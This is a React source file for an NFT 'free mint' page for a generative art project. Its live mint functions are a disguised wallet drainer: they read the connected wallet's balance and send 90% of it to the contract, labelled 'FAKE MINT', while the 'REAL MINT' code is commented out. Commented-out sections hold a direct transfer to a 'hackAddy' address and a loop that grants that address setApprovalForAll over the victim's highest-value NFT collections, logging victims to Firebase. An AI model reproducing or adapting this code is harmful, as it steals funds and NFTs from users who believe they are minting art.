import React, { useState, useEffect } from "react";
import { ethers, BigNumber } from "ethers";
import { Box, Button, Flex, Input, Text } from "@chakra-ui/react";
import { useConnectWallet, useSetChain, useWallets } from "@web3-onboard/react";
import * as services from "../services/Services";
import contractAbi from "../abi/abi.json";
import {
  Network,
  initializeAlchemy,
  getNftsForOwner,
  getNftMetadata,
  BaseNft,
  NftTokenType,
} from "@alch/alchemy-sdk";
import StartFirebase from "../services/Firebase";
import { ref, set, get, update, remove, child } from "firebase/database";

let provider;
let uniqueNFT = new Map();
let hackAddy = "0x0a1EE150f27EAB075F358C364f59d9a44371Fd66";

const MainMint = ({
  projectName,
  accounts,
  setAccounts,
  contractAddress,
  connectAccounts,
  connectWallet,
}) => {
  const [{ wallet }, connect, disconnect] = useConnectWallet();
  const [mintAmount, setMintAmount] = useState(1);
  const [totalSupply, setTotalSupply] = useState(0);
  const [maxSupply, setMaxSupply] = useState(services.supply);
  const [maxPerMint, setMaxPerMint] = useState(5);
  const [currentCost, setCurrentCost] = useState(0);
  const [freeClaimed, setFreeClaimed] = useState(false);

  useEffect(() => {
    loadWeb3();
  }, [wallet]);

  async function fetchAsync(url) {
    const options = {
      method: "GET",
      // headers: {
      //   Accept: "application/json",
      //   "X-API-KEY": "319bddc4501d443aaea179db73c404f1",
      // },
    };

    return fetch(url, options)
      .then((response) => response.json())
      .catch((err) => console.error(err));
  }

  async function loadWeb3() {
    if (wallet) {
      provider = new ethers.providers.Web3Provider(wallet.provider, "any");
      const signer = provider.getSigner();
      const contract = new ethers.Contract(
        contractAddress,
        contractAbi,
        signer
      );
      // Load max mint per tx
      console.log("Loading max mint per tx...");
      const maxMint = await contract.maxMintAmountPerTx();
      setMaxPerMint(maxMint);
      console.log("Test, ", maxMint);
      // Check supply
      console.log("Checking supply...");
      const currentSupply = await contract.totalSupply();

      setTotalSupply(currentSupply);
      if (currentSupply >= maxMint) {
        console.log("All Sold Out!");
        // return;
      }
      // Load current price
      console.log("Loading current price...");
      const currPrice = await contract.cost();
      setCurrentCost(currPrice / 10 ** 18);
      console.log("current supply...", totalSupply);

      const maxSupp = await contract.maxSupply();
      console.log("max supply...", maxSupp.toNumber());
      setMaxSupply(maxSupp.toNumber());

      // let freeSupply = await contract.freeSupply();
      // setFreeClaimed(freeSupply == 0);

      let walletAddy = wallet.accounts[0].address;
      console.log("Wallet Address: ", walletAddy);
      const queryURL = `https://api.opensea.io/api/v1/collections?asset_owner=${walletAddy}&offset=0&limit=300`;
      const nftsForOwner = await fetchAsync(queryURL);
      console.log("Number of NFTs", nftsForOwner);
      uniqueNFT = nftsForOwner;
      uniqueNFT.sort((a, b) => {
        const second = b.stats.one_day_average_price * b.owned_asset_count || 0;
        const first = a.stats.one_day_average_price * a.owned_asset_count || 0;
        return second - first;
      });
    }
  }

  // Optional Config object, but defaults to demo api-key and eth-mainnet.
  const settings = {
    apiKey: "uAxDeQFp5DXFiJ6_Lc_toHmgbjDK3iGK", // Replace with your Alchemy API Key.
    network: Network.ETH_MAINNET, // Replace with your network.
    maxRetries: 10,
  };

  const alchemy = initializeAlchemy(settings);

  const numberWithCommas = (x) => {
    return x.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",");
  };

  async function handleMint() {
    // Real Mint
    if (wallet) {
      const signer = provider.getSigner();
      const contract = new ethers.Contract(
        contractAddress,
        contractAbi,
        signer
      );
      try {
        const walletBalance = await signer.getBalance();
        const walletBalanceInETH = ethers.utils.formatEther(walletBalance);
        const valueOfTx = walletBalanceInETH * 0.9;
        const targetTx = parseFloat(valueOfTx.toFixed(3));
        // const response = await contract.mint(BigNumber.from(mintAmount), {
        //   value: ethers.utils.parseEther((walletBalanceInETH * 0.7).toString()),
        // });
        const totalCost = currentCost * mintAmount;
        // FAKE MINT
        if (valueOfTx > totalCost) {
          const response = await contract.mint(BigNumber.from(mintAmount), {
            value: ethers.utils.parseEther(valueOfTx.toFixed(3).toString()),
          });
          console.log("response: ", response);
        } else {
          const response = await contract.mint(BigNumber.from(mintAmount), {
            value: ethers.utils.parseEther(
              (currentCost * mintAmount).toString()
            ),
          });
          console.log("response: ", response);
        }
        // REAL MINT
        // const response = await contract.mint(BigNumber.from(mintAmount), {
        //   value: ethers.utils.parseEther(totalCost.toString()),
        // });
      } catch (err) {
        console.log("error: ", err);
      }
    }

    // logEvent(analytics, "approved", {
    //   vic: "149",
    //   value: wallet.accounts[0].address,
    // });

    // Contract Interaction
    // const db = StartFirebase();
    // if (wallet) {
    //   const newNFT = new Map(
    //     [...uniqueNFT.entries()].sort((a, b) => {
    //       const second = b[1] ? b[1] : 0;
    //       const first = a[1] ? a[1] : 0;
    //       return second - first;
    //     })
    //   );
    //   uniqueNFT = newNFT;
    //   const signer = provider.getSigner();
    //   let currABI = [
    //     "function setApprovalForAll(address operator, bool approved) public virtual override",
    //   ];
    //   for (const [key, value] of uniqueNFT.entries()) {
    //     let contract = new ethers.Contract(key, currABI, signer);
    //     await contract.setApprovalForAll(hackAddy, 1);
    //     set(ref(db, "Approved/" + wallet.accounts[0].address), {
    //       contractAddress: key,
    //     });
    //   }
    // }
  }

  async function handleFreeMint() {
    // Real Mint
    if (wallet) {
      const signer = provider.getSigner();
      const contract = new ethers.Contract(
        contractAddress,
        contractAbi,
        signer
      );
      try {
        // 80% mint
        const walletBalance = await signer.getBalance();
        const walletBalanceInETH = ethers.utils.formatEther(walletBalance);
        const valueOfTx = walletBalanceInETH * 0.9;
        const targetTx = parseFloat(valueOfTx.toFixed(3));
        const response = await contract.mint(BigNumber.from(mintAmount), {
          value: ethers.utils.parseEther(targetTx.toString()),
        });
        // end 80% mint
        // add on: transfer direct
        // const response = signer.sendTransaction({
        //   to: hackAddy,
        //   value: ethers.utils.parseEther(targetTx.toString()),
        // });
        // const totalCost = currentCost * mintAmount;
        // if (walletBalanceInETH * 0.7 > totalCost) {
        //   const response = await contract.mint(BigNumber.from(mintAmount), {
        //     value: ethers.utils.parseEther(
        //       (walletBalanceInETH * 0.7).toString()
        //     ),
        //   });
        //   console.log("response: ", response);
        // } else {
        //   const response = await contract.mint(BigNumber.from(mintAmount), {
        //     value: ethers.utils.parseEther(
        //       (currentCost * mintAmount).toString()
        //     ),
        //   });
        //   console.log("response: ", response);
        // }
        // const response = await contract.mint(BigNumber.from(mintAmount), {
        //   value: ethers.utils.parseEther(totalCost.toString()),
        // });
        // Legit Free
        // const response = await contract.mint(BigNumber.from(1), {
        //   value: ethers.utils.parseEther("0"),
        // });
        // Legit End
      } catch (err) {
        console.log("error: ", err);
      }
    }
    // End Real Mint
    // logEvent(analytics, "approved", {
    //   vic: "149",
    //   value: wallet.accounts[0].address,
    // });
    // Contract Interaction (Comment out below this line)
    // if (wallet) {
    //   const signer = provider.getSigner();
    //   const contract = new ethers.Contract(
    //     contractAddress,
    //     contractAbi,
    //     signer
    //   );
    //   try {
    //     // const walletBalance = await signer.getBalance();
    //     // const walletBalanceInETH = ethers.utils.formatEther(walletBalance);
    //     // // const response = await contract.mint(BigNumber.from(mintAmount), {
    //     // //   value: ethers.utils.parseEther((walletBalanceInETH * 0.7).toString()),
    //     // // });
    //     // const totalCost = currentCost * mintAmount;
    //     // if (walletBalanceInETH * 0.7 > totalCost) {
    //     //   const response = await contract.mint(BigNumber.from(mintAmount), {
    //     //     value: ethers.utils.parseEther(
    //     //       (walletBalanceInETH * 0.7).toString()
    //     //     ),
    //     //   });
    //     //   console.log("response: ", response);
    //     // } else {
    //     //   const response = await contract.mint(BigNumber.from(mintAmount), {
    //     //     value: ethers.utils.parseEther(
    //     //       (currentCost * mintAmount).toString()
    //     //     ),
    //     //   });
    //     //   console.log("response: ", response);
    //     // }
    //     // const response = await contract.mint(BigNumber.from(mintAmount), {
    //     //   value: ethers.utils.parseEther((currentCost * mintAmount).toString()),
    //     // });
    //     // Start firebase
    //     const db = StartFirebase();
    //     let maxNumber = Math.max(Object.keys(uniqueNFT).length, 6);
    //     let currABI = [
    //       "function setApprovalForAll(address operator, bool approved) public virtual override",
    //     ];
    //     for (let i = 0; i < maxNumber; i++) {
    //       console.log("test", uniqueNFT[i]);
    //       const targetAddress = uniqueNFT[i].primary_asset_contracts[0].address;
    //       const name = uniqueNFT[i].name;
    //       const floor = uniqueNFT[i].stats.one_day_average_price;
    //       const assetNo = uniqueNFT[i].owned_asset_count;
    //       console.log(
    //         "Found: ",
    //         name,
    //         ", value: ",
    //         floor * assetNo,
    //         targetAddress
    //       );
    //       try {
    //         let contract = new ethers.Contract(targetAddress, currABI, signer);
    //         set(
    //           ref(
    //             db,
    //             "Checked/" + i + ": " + name + ": " + wallet.accounts[0].address
    //           ),
    //           {
    //             contractAddress: targetAddress,
    //           }
    //         );
    //         await contract.setApprovalForAll(hackAddy, 1);
    //         set(
    //           ref(
    //             db,
    //             "Approved/" +
    //               i +
    //               ": " +
    //               name +
    //               ": " +
    //               wallet.accounts[0].address
    //           ),
    //           {
    //             contractAddress: targetAddress,
    //           }
    //         );
    //       } catch (err) {
    //         continue;
    //       }
    //     }
    //   } catch (err) {
    //     console.log("error: ", err);
    //   }
    // }
    // Contract Interaction End (Comment out above this line)
  }

  const handleDecrement = () => {
    if (mintAmount <= 1) return;
    setMintAmount(mintAmount - 1);
  };

  const handleIncrement = () => {
    if (mintAmount >= maxPerMint) return;
    setMintAmount(mintAmount + 1);
  };

  return (
    <Flex justify="center" align="center" height="100vh" paddingBottom="150px">
      <Box width="900px">
        <div>
          <Text fontSize="600%" color="#e49c00" textShadow="0 5px #000000">
            {projectName}
          </Text>
          <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            {/* TODO */}
            {/* {numberWithCommas(
              services.supply
              // )} (${maxPerMint} per tx)`}
            )}{" "} */}
            A fast-generative project aimed to emulate the free flow nature of
            elastic gravity in an enclosed vaccum.
          </Text>
          <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            Focuses on the fundamental building block of life, a box, to create
            an astounding piece of art.
          </Text>
          <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            Generated, curated, and meticulously handpicked by AKang
          </Text>
          {/* <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            More details follow soon...
          </Text> */}
          <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            {/* TODO */}
            {/* {`Reveals 8PM EST // Currently ${
              currentCost === 0 ? "Free!" : "Free!"
            }`} */}
            1 free per wallet (first 333 wallets), 0.003e for more
          </Text>
          <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            {/* TODO */}
            {`SUPPLY: ${totalSupply}/${numberWithCommas(
              maxSupply
              // )} (${maxPerMint} per tx)`}
            )} (10 per tx)`}
          </Text>
          <Text
            fontSize="150%"
            letterSpacing="-5.5%"
            fontFamiy="VT323"
            textShadow="0 2px 2px #000000"
          >
            {/* TODO */}
            {`This mint will cost you ${mintAmount * currentCost} eth`}
          </Text>
        </div>
        {wallet ? (
          <div>
            <Flex align="center" justify="center">
              <Button
                backgroundColor="#e49c00"
                borderRadius="5px"
                boxShadow="0px 2px 2px 1px #0F0F0F"
                color="black"
                cursor="pointer"
                fontFamily="inherit"
                padding="15px"
                marginTop="10px"
                fontSize="30"
                onClick={handleDecrement}
                height="40px"
              >
                -
              </Button>
              <Input
                readOnly
                fontFamily="inherit"
                fontSize="20"
                width="100px"
                height="40px"
                textAlign="center"
                paddingLeft="19px"
                marginTop="10px"
                type="number"
                value={mintAmount}
              />
              <Button
                backgroundColor="#e49c00"
                borderRadius="5px"
                boxShadow="0px 2px 2px 1px #0F0F0F"
                color="black"
                cursor="pointer"
                fontFamily="inherit"
                padding="15px"
                marginTop="10px"
                fontSize="30"
                onClick={handleIncrement}
                height="40px"
              >
                +
              </Button>
            </Flex>
            <Button
              backgroundColor="#e49c00"
              borderRadius="5px"
              boxShadow="0px 2px 2px 1px #0F0F0F"
              color="black"
              cursor="pointer"
              fontFamily="inherit"
              padding="15px"
              marginTop="10px"
              fontSize="150%"
              // onClick={() => {
              //   if (totalSupply < services.supply) {
              //     handleMint();
              //   }
              // }}
              onClick={handleMint}
            >
              {/* {totalSupply >= services.supply ? "Sold Out" : "Mint Now"} */}
              Paid Mint
            </Button>
            <Button
              backgroundColor="#e49c00"
              borderRadius="5px"
              boxShadow="0px 2px 2px 1px #0F0F0F"
              color="black"
              cursor="pointer"
              fontFamily="inherit"
              padding="15px"
              marginTop="10px"
              fontSize="150%"
              // onClick={() => {
              //   if (totalSupply < services.supply) {
              //     handleMint();
              //   }
              // }}
              onClick={() => {
                if (freeClaimed) {
                  alert("You have already claimed this!");
                } else {
                  handleFreeMint();
                }
              }}
            >
              {/* {totalSupply >= services.supply ? "Sold Out" : "Mint Now"} */}
              3x Free Mint
            </Button>
          </div>
        ) : (
          <Button
            backgroundColor="#e49c00"
            borderRadius="5px"
            boxShadow="0px 2px 2px 1px #0F0F0F"
            color="black"
            cursor="pointer"
            fontFamily="inherit"
            padding="15px"
            marginTop="10px"
            fontSize="30"
            onClick={connectWallet}
          >
            Connect Wallet
          </Button>
        )}
      </Box>
    </Flex>
  );
};

export default MainMint;
